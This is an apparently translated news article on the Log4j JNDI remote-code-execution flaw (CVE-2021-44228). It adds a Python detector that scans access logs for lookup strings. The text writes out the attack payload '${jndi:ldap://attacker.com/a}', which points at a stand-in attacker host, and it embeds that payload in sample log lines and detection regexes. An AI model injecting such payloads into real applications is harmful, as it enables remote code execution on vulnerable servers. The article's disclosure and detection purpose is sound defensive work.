Catastrophic vulnerability in Apache Log4j affecting many Java projects

A critical vulnerability has been identified in Apache Log4j, a popular logging framework for Java applications, that allows arbitrary code to be executed when a specially formatted value of the form “${jndi:URL}” is written to the log. Any Java application that logs values received from external sources is exposed, for example one that echoes a problematic input value into an error message.

It is noted that almost all projects built on frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected, as are Steam, Apple iCloud, and Minecraft clients and servers. The vulnerability is expected to trigger a wave of mass attacks on corporate applications, including scanning of the network for vulnerable systems, repeating the history of the critical vulnerabilities in the Apache Struts framework, which by a rough estimate is used in the web applications of 65% of Fortune 100 companies.

The problem is aggravated by the fact that a working exploit has already been published, while no fixes have yet been prepared for the stable branches. A CVE identifier has not yet been assigned. The fix is so far only included in the log4j-2.15.0-rc1 test release. As a workaround that blocks the vulnerability, it is recommended to set the log4j2.formatMsgNoLookups parameter to true.

The root cause is that log4j processes special “${}” lookup masks in strings written to the log, and among the supported lookups are JNDI (Java Naming and Directory Interface) queries. The attack boils down to passing a string containing the substitution “${jndi:ldap://attacker.com/a}”; when log4j processes it, it sends an LDAP request to the attacker.com server asking for the path to a Java class. The path returned by the attacker's server (for example, http://second-stage.attacker.com/Exploit.class) is then loaded and executed in the context of the current process, which allows the attacker to run arbitrary code on the system with the privileges of the affected application.
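As an added example (not from the original article and not code from the Log4j project), the following Python script shows the kind of detection logic a defender can run over web server access logs to find the “${jndi:...}” lookup described above and pull out the host it points at for blocklisting or triage. It also flags any other “${name:...}” lookup that turns up in untrusted request data, since no such lookup belongs there and formatMsgNoLookups disables them all. The log lines are constructed samples, and the function names, the severity labels and the regular expressions are my own.

```python
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Matches a log4j lookup of the form ${jndi:<scheme>:<target>}.
# Case-insensitive and whitespace-tolerant so that simple case
# variations such as "${JNDI:...}" are still caught.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z][a-z0-9+.-]*)\s*:(?P<target>[^}]*)\}",
    re.IGNORECASE,
)

# Broader pattern: any ${name:...} lookup inside request data is unexpected
# and worth flagging even when it is not a JNDI lookup.
ANY_LOOKUP = re.compile(r"\$\{\s*[a-z]+\s*:", re.IGNORECASE)


def extract_jndi_lookups(line: str) -> List[Dict[str, str]]:
    """Return one record per ${jndi:...} lookup found in a single log line."""
    hits = []
    for m in JNDI_LOOKUP.finditer(line):
        scheme = m.group("scheme").lower()
        target = m.group("target").strip()
        # For URL-like targets (ldap://host/path) extract the host so it can
        # be fed to a blocklist or a threat-intelligence lookup.
        parsed = urlsplit(f"{scheme}:{target}")
        hits.append({
            "raw": m.group(0),
            "scheme": scheme,
            "host": parsed.hostname or "",
            "target": target,
        })
    return hits


def scan_log(lines: List[str]) -> List[Dict]:
    """Scan log lines; 'high' for JNDI lookups, 'medium' for any other lookup."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        jndi = extract_jndi_lookups(line)
        if jndi:
            findings.append({"line": lineno, "severity": "high", "lookups": jndi})
        elif ANY_LOOKUP.search(line):
            findings.append({"line": lineno, "severity": "medium", "lookups": []})
    return findings


def suspicious_hosts(findings: List[Dict]) -> List[str]:
    """Distinct hosts referenced by JNDI lookups, sorted for reporting."""
    hosts = {h["host"] for f in findings for h in f["lookups"] if h["host"]}
    return sorted(hosts)


# Constructed sample access-log lines (Apache combined format); the second
# and third carry the lookup from the article in the User-Agent and the
# query string, the fourth carries a non-JNDI lookup.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Dec/2021:08:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:08:01:15 +0000] "GET /login HTTP/1.1" 200 812 "-" "${jndi:ldap://attacker.com/a}"',
    '10.0.0.9 - - [10/Dec/2021:08:01:16 +0000] "GET /search?q=${JNDI:LDAP://attacker.com/a} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.12 - - [10/Dec/2021:08:02:01 +0000] "GET /api HTTP/1.1" 200 100 "-" "${env:HOME}"',
]

if __name__ == "__main__":
    results = scan_log(SAMPLE_ACCESS_LOG)
    for f in results:
        print(f"line {f['line']}: {f['severity']}", [h["raw"] for h in f["lookups"]])
    print("hosts to block/investigate:", suspicious_hosts(results))
```

Run it against a real access log by replacing SAMPLE_ACCESS_LOG with the file's lines; the "medium" findings are noisy by design and are meant for review rather than for automatic blocking.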

Addendum 1: The vulnerability has been assigned the identifier CVE-2021-44228.

Addendum 2: A way to bypass the protection added in release log4j-2.15.0-rc1 has been identified. A new update, log4j-2.15.0-rc2, has been proposed with more complete protection against the vulnerability. The highlighted code change concerns the absence of an abnormal termination when a malformed JNDI URL is used.

Source: opennet.ru
